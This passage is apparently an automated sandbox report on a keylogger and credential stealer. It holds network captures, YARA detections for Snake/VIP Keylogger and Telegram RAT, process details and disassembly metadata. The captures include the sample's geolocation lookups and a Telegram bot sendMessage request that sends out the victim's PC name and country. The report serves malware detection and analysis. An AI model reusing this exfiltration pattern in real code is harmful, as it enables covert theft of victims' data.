                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jStVIWdRFyzlxV1UqGk3WxKtX%2BFTpB%2F8oS6I8QSeBpi15T%2B%2Fham0795NKo5jMMpiVF9RB9USAwKdsbwDucEdcxSYB67Hxl%2BPNqvs3E2TdskvonTt36GlV2kYATGjxjVGlltAm7GC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889ccc1bf27c9c-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1975&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1471774&cwnd=252&unsent_bytes=0&cid=19de8bcd8e40ebb6&ts=458&x=0"
2024-11-26 08:47:13 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49742 | 104.21.67.152 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:47:16 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                    Connection: Keep-Alive
2024-11-26 08:47:16 UTC | 849 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:16 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574745
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4JEiLDQYWtidHzRrMDJeniewlSRccYXL75vcvlA0%2BDB5L9NPgSVlyYWGJseDVK3IoDbVzwlIBxVjBlL26Z6EJDOgdKJ6x3OA4YPdd20NunsyyLsw7oGp2vpQCbA%2FJYUUcX7R60xo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889ce16dfd1906-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1690&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1708601&cwnd=252&unsent_bytes=0&cid=95544cab385a6654&ts=468&x=0"
2024-11-26 08:47:16 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.7 | 49754 | 104.21.67.152 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:47:19 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
2024-11-26 08:47:20 UTC | 853 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:20 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574749
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ggGZW7teZ9JLSIJffZDZT2Z9isjl2NRa21mtPv3cN8oYxjA9t%2FpGqJSRegcb4e0c%2BrZZo2G7LPDtG%2BqN3Q83pGhZJ%2BjkNltxEBBll76BLfyyQNgttdUpxYoRbJs2Y7FHxYdOx2C"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889cf68dc842e4-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1564&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1861057&cwnd=228&unsent_bytes=0&cid=5ac5192ddf0c7578&ts=464&x=0"
2024-11-26 08:47:20 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.7 | 49761 | 104.21.67.152 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:47:23 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                    Host: reallyfreegeoip.org
2024-11-26 08:47:23 UTC | 855 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:23 GMT
                                                                                                                                    Content-Type: text/xml
                                                                                                                                    Content-Length: 361
                                                                                                                                    Connection: close
                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                    Age: 574752
                                                                                                                                    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5ZtiMv1AN6GGwQI1xqX0nxjsx633R6%2FpjJifOUyf%2F4CzJ4%2Bvd%2F65d16osopzNgVt5W8OHVwAzzX1YDAaND7mcKQi9owg9YsUyTcKGenJLkoB55qDDhH1KA%2FrCbQ5kJQSu5ZXsOSQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 8e889d0b3dae4337-EWR
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1793&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1348729&cwnd=215&unsent_bytes=0&cid=6e5d9d079d732777&ts=464&x=0"
2024-11-26 08:47:23 UTC | 361 | IN | Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.7 | 49767 | 149.154.167.220 | 443 | 6748 | C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-26 08:47:25 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:258555%0D%0ADate%20and%20Time:%2027/11/2024%20/%2012:08:33%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20258555%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                    Host: api.telegram.org
                                                                                                                                    Connection: Keep-Alive
2024-11-26 08:47:25 UTC | 344 | IN | HTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                    Date: Tue, 26 Nov 2024 08:47:25 GMT
                                                                                                                                    Content-Type: application/json
                                                                                                                                    Content-Length: 55
                                                                                                                                    Connection: close
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-26 08:47:25 UTC | 55 | IN | Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                                                                                                    Target ID:0
                                                                                                                                    Start time:03:46:50
                                                                                                                                    Start date:26/11/2024
                                                                                                                                    Path:C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\Desktop\173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd389928c3c633.dat-decoded.exe"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:207'872 bytes
                                                                                                                                    MD5 hash:17FDE190E651AEE3335ED55EEAA1A6DB
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.3680474042.0000000002510000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3680219569.000000000219F000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000003.1234929612.0000000000599000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                    • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.3685378701.0000000004B10000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.3680555614.0000000002581000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false


                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:8.7%
                                                                                                                                      Dynamic/Decrypted Code Coverage:53%
                                                                                                                                      Signature Coverage:25%
                                                                                                                                      Total number of Nodes:428
                                                                                                                                      Total number of Limit Nodes:37
641da52 83753->83754 83755 641db22 83754->83755 83756 61c995f LdrInitializeThunk 83754->83756 83757 61c9578 LdrInitializeThunk 83754->83757 83755->83627 83756->83755 83757->83755 83759 641da74 83758->83759 83760 641db22 83759->83760 83761 61c995f LdrInitializeThunk 83759->83761 83762 61c9578 LdrInitializeThunk 83759->83762 83760->83627 83761->83760 83762->83760 83764 65da4c0 83763->83764 83779 65d9cdc 83764->83779 83768 65da4c5 83767->83768 83769 65d9cdc 3 API calls 83768->83769 83770 65da4f0 83769->83770 83770->83628 83774 61c95a9 83771->83774 83772 61c970c 83772->83655 83773 61c9a9c LdrInitializeThunk 83773->83772 83774->83772 83774->83773 83776 61c9816 83775->83776 83777 61c9a9c LdrInitializeThunk 83776->83777 83778 61c9ab4 83777->83778 83778->83655 83781 65d9ce7 83779->83781 83783 65db444 83781->83783 83782 65dbe76 83782->83782 83785 65db44f 83783->83785 83784 65dc714 83786 65dc76f 83784->83786 83795 70ab5c8 83784->83795 83799 70ab978 83784->83799 83785->83784 83785->83786 83790 65de3a8 83785->83790 83786->83782 83791 65de3c9 83790->83791 83792 65de3ed 83791->83792 83803 65de558 83791->83803 83807 65de548 83791->83807 83792->83784 83797 70ab976 83795->83797 83796 70abe40 WaitMessage 83796->83797 83797->83796 83798 70aba2a 83797->83798 83798->83786 83801 70ab9dd 83799->83801 83800 70aba2a 83800->83786 83801->83800 83802 70abe40 WaitMessage 83801->83802 83802->83801 83804 65de565 83803->83804 83805 65de59e 83804->83805 83812 65dd094 83804->83812 83805->83792 83808 65de53c 83807->83808 83809 65de552 83807->83809 83808->83792 83810 65de59e 83809->83810 83811 65dd094 GetModuleHandleW 83809->83811 83810->83792 83811->83810 83813 65dd09f 83812->83813 83815 65de610 83813->83815 83816 65dd0c8 83813->83816 83815->83815 83817 65dd0d3 83816->83817 83823 65dd0d8 83817->83823 83819 65de67f 83827 70a4210 83819->83827 83832 70a4228 83819->83832 83820 65de6b9 83820->83815 83826 65dd0e3 83823->83826 83824 65dfa80 83824->83819 83825 65de3a8 GetModuleHandleW 83825->83824 
83826->83824 83826->83825 83828 70a4228 83827->83828 83829 70a4265 83828->83829 83838 70a44a0 83828->83838 83841 70a4490 83828->83841 83829->83820 83834 70a42a5 83832->83834 83835 70a4259 83832->83835 83833 70a4265 83833->83820 83834->83820 83835->83833 83836 70a4490 GetModuleHandleW 83835->83836 83837 70a44a0 GetModuleHandleW 83835->83837 83836->83834 83837->83834 83845 70a44e2 83838->83845 83839 70a44aa 83839->83829 83842 70a44a0 83841->83842 83844 70a44e2 GetModuleHandleW 83842->83844 83843 70a44aa 83843->83829 83844->83843 83846 70a4524 83845->83846 83848 70a4501 83845->83848 83846->83839 83847 70a4728 GetModuleHandleW 83849 70a4755 83847->83849 83848->83846 83848->83847 83849->83839

Control-flow Graph: first block 4019f0-401ac7
                                                                                                                                      APIs
                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                      • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                      • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                      • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                      • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                      • _memset.LIBCMT ref: 00401EDD
                                                                                                                                      • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                      • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                      • API String ID: 1430744539-2962942730

Control-flow Graph: first block 2162ef8-2162f53
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Xq$Xq$Xq$Xq$Xq$Xq
                                                                                                                                      • API String ID: 0-905847027

Control-flow Graph: first block 2167630-2167653
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$(oq$(oq$,q$,q
                                                                                                                                      • API String ID: 0-189141485
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: N
                                                                                                                                      • API String ID: 0-1130791706

                                                                                                                                      Control-flow Graph

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$Hq$\;q
                                                                                                                                      • API String ID: 0-3898731621
                                                                                                                                      • Opcode ID: 3262d896c439bc0da97d50b01482c9c32dbac4c84af22b646717b062019ef98b
                                                                                                                                      • Instruction ID: a7d180bae965ab3bd1b3bdf775714bb9113eb6d843c1abfac1e131f4ddcf4705
                                                                                                                                      • Opcode Fuzzy Hash: 3262d896c439bc0da97d50b01482c9c32dbac4c84af22b646717b062019ef98b
                                                                                                                                      • Instruction Fuzzy Hash: 7D128070A002198FDB18DF69C858BAEBBF6FF88304F148569E405DB395EB349D56CB90
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3689361519.00000000065D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065D0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_65d0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Teq$p@q
                                                                                                                                      • API String ID: 0-2716814348
                                                                                                                                      • Opcode ID: e2a5f608a6e4197c848ff129d3f0e86611f424dd0f0a69e2672a7b5504f3833e
                                                                                                                                      • Instruction ID: 5394938365c9ba3c29695514ba1c1515470a48b2186895844079fd71b9a112c8
                                                                                                                                      • Opcode Fuzzy Hash: e2a5f608a6e4197c848ff129d3f0e86611f424dd0f0a69e2672a7b5504f3833e
                                                                                                                                      • Instruction Fuzzy Hash: 74C2E774A01219CFDB64DF24C998BADBBB2FB89301F1085E9D80967364DB35AE85DF40
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3687533440.00000000061C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_61c0000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: K
                                                                                                                                      • API String ID: 0-856455061
                                                                                                                                      • Opcode ID: e46d1c4187e4d26cb7ae83e3fe82fe18a844a12bd72dbeb160896c625da32065
                                                                                                                                      • Instruction ID: 4570f85fff8942b37e5df86358702191d082a35bf1d3fbf7a12886447be70802
                                                                                                                                      • Opcode Fuzzy Hash: e46d1c4187e4d26cb7ae83e3fe82fe18a844a12bd72dbeb160896c625da32065
                                                                                                                                      • Instruction Fuzzy Hash: 8333F430C147198EDB51EF68C894A9DF7B1FF99310F15C69AD448AB261EB70AAC4CF81
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (oq$4'q
                                                                                                                                      • API String ID: 0-1336004174
                                                                                                                                      • Opcode ID: 8f941da77e9d7f5ff8266f6859bac5d9609c0a2b7b970ef915386f8f61122ea3
                                                                                                                                      • Instruction ID: 0bc049afffb6f2d6f7845d62b7129b679c705a849ecb5b803231421cc788c656
                                                                                                                                      • Opcode Fuzzy Hash: 8f941da77e9d7f5ff8266f6859bac5d9609c0a2b7b970ef915386f8f61122ea3
                                                                                                                                      • Instruction Fuzzy Hash: 28827D71A40209DFCB15CF68C588ABEBBF2BF88304F158599E815EB361D731E961CB91
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: Xq$$q
                                                                                                                                      • API String ID: 0-855381642
                                                                                                                                      • Opcode ID: 7ca15a105d06945951abd02530d7a3387cf3ccc321252c644510db8b246ef9a2
                                                                                                                                      • Instruction ID: 42950d7c972eeac2b2ec8b17b440cf662e9e62cd3be706297d8d3784c44f4f58
                                                                                                                                      • Opcode Fuzzy Hash: 7ca15a105d06945951abd02530d7a3387cf3ccc321252c644510db8b246ef9a2
                                                                                                                                      • Instruction Fuzzy Hash: 4AF17C74E04348DFDB18DFB9D898AAEBBB3BF89300B158529E446A7354CF349812CB50
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 95977c83cf9166e02a5d71d2d642b28155b38e7fa451cf2fd325b6b67e1ae0f2
                                                                                                                                      • Instruction ID: c82bcad92b223ec86deafbaf82eb298ea5b37adddac015aad85cd90fde9257da
                                                                                                                                      • Opcode Fuzzy Hash: 95977c83cf9166e02a5d71d2d642b28155b38e7fa451cf2fd325b6b67e1ae0f2
                                                                                                                                      • Instruction Fuzzy Hash: F7E10C75E40218CFDB14DF69C888AADBBB2BF48310F15906AE859AB361D730EC51CF94
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3680156839.0000000002160000.00000040.00000800.00020000.00000000.sdmp, Offset: 02160000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_2160000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: PHq$PHq
                                                                                                                                      • API String ID: 0-1274609152
                                                                                                                                      • Opcode ID: 0864a5dc1baf63d92cf0d7abf0fc10c91b63530c7e95ac8775defde8fe9041e6
                                                                                                                                      • Instruction ID: 4e00a5fa35ed20926cd09b5948d49f4fc103695ed703bf3cedd1981dd04f6db5
                                                                                                                                      • Opcode Fuzzy Hash: 0864a5dc1baf63d92cf0d7abf0fc10c91b63530c7e95ac8775defde8fe9041e6
